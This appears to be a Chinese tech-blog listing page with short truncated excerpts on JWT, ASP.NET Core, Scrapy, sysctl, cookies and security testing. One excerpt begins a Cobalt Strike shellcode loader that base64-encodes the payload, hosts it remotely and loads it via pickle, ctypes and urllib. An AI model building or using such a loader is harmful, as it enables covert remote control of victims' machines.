如何使用在线工具手动验证JWT签名 先丢一个转换地址:https://cryptii.com/ 首先: jwt分为三个部分:header,payload,verifysignature header {"typ":"JWT","alg":"HS256"} base64转换: eyJ0eXAiOiJK ...
分类:
其他好文 时间:
2021-01-18 10:42:34
阅读次数:
0
在这篇文章中,我将介绍ASP.NET Core 数据保护系统:它是什么,为什么我们需要它,以及它如何工作。 为什么我们需要数据保护系统? 数据保护系统是ASP.NET Core使用的一组加密api。加密必须由不受信任的第三方处理的数据。 这方面的典型例子是身份验证cookie。cookie是在请求之 ...
分类:
Web程序 时间:
2021-01-15 12:14:04
阅读次数:
0
middlewares.py class MiddlewareDownloaderMiddleware: @classmethod def from_crawler(cls, crawler): # This method is used by Scrapy to create your spide ...
分类:
编程语言 时间:
2021-01-14 11:23:09
阅读次数:
0
#!/bin/bashecho -e "\033[36m \t\t\t 優化系統核心參數 \t\t\t \033[0m" grep 'keepalive_time = 1200' /etc/sysctl.conf &>/dev/null if [ $? -ne 0 ];then cat >> /et ...
分类:
其他好文 时间:
2021-01-14 10:58:27
阅读次数:
0
session:记录在服务器端 默认被存在在服务器的一个文件里(不是内存),session 的运行依赖 sessionID,而 sessionID是存在 cookie 中的 cookie:记录在客户端 session作用:当浏览器访问服务器端某个页面时,会在服务器端开辟出一段内存,这段内存就叫做se ...
分类:
Web程序 时间:
2021-01-14 10:39:32
阅读次数:
0
JWT """ 1、组成: header.payload.signature 头.载荷.签名 2、距离: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6Im93ZW4iLCJleHAiOjE1NTgzMDM1 ...
分类:
其他好文 时间:
2021-01-13 10:31:37
阅读次数:
0
一般拿到的cookies字符串格式为"xxx:xxxxx; xxxx:xxxxx; ",简单自定义一个函数转换 def cookie_to_dic(mycookie): dic = {} for i in mycookie.split('; '): dic[i.split('=')[0]] = i. ...
分类:
编程语言 时间:
2021-01-12 11:13:55
阅读次数:
0
使用CS里面生成payload,选择python 勾选64位。 将shellcode代码编码成BASE64 放在远程服务器上 反序列化代码 import pickle import base64 shellcode = """ import ctypes,urllib.request,codecs, ...
分类:
编程语言 时间:
2021-01-12 11:01:03
阅读次数:
0
<?php //使用session //设置session // session_start(); // $_SESSION['a'] = 'admin'; //设置cookie,如果有cookie,说明用户已经登陆或者cookie在过期时间内,可以进行页面跳转,直接跳转到首页 if($_COOKI ...
分类:
Web程序 时间:
2021-01-12 10:30:28
阅读次数:
0
安全性测试的测试点 1.跨网站脚本攻击 通过脚本语言的缺陷模拟合法用户,控制其账户,盗窃敏感数据 2.注入攻击 通过构造查询对数据库、LDAP和其他系统进行非法查询 3.恶意文件执行 在服务器上执行Shell 命令Execute,获取控制权 4.伪造跨站点请求 发起Blind 请求,模拟合法用户,要 ...
分类:
其他好文 时间:
2021-01-07 12:19:23
阅读次数:
0
